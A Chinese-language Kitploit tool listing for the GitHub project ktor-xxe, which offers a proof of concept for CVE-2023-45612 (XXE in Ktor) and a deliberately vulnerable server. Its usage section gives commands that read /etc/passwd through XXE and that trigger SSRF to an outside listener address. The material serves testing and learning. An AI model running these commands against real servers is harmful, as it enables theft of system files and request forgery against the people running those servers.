Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
ktor-xxe — CVE-2023-45612 POC 及存在漏洞的项目。 | Kitploit
工具/GitHubGitHub/seraphimi/ktor-xxe
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育
GitHubseraphimi/ktor-xxe

ktor-xxe

CVE-2023-45612 POC 及存在漏洞的项目。

查看仓库
10个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

ktor-xxe

使用以下命令运行项目:

| ./gradlew run | 运行服务器 |

如果服务器启动成功,您将看到以下输出:

root@kitploit:~
2024-12-04 14:32:45.584 [main] INFO  Application - Application started in 0.303 seconds.
2024-12-04 14:32:45.682 [main] INFO  Application - Responding at http://0.0.0.0:8080

利用 XXE poc:

文件泄露

root@kitploit:~
python3 poc.py http://localhost:8080 --file /etc/hostname
python3 poc.py http://localhost:8080 --file /etc/passwd

SSRF

root@kitploit:~
python3 poc.py http://localhost:8080 --url http://listeneraddress/
下载工具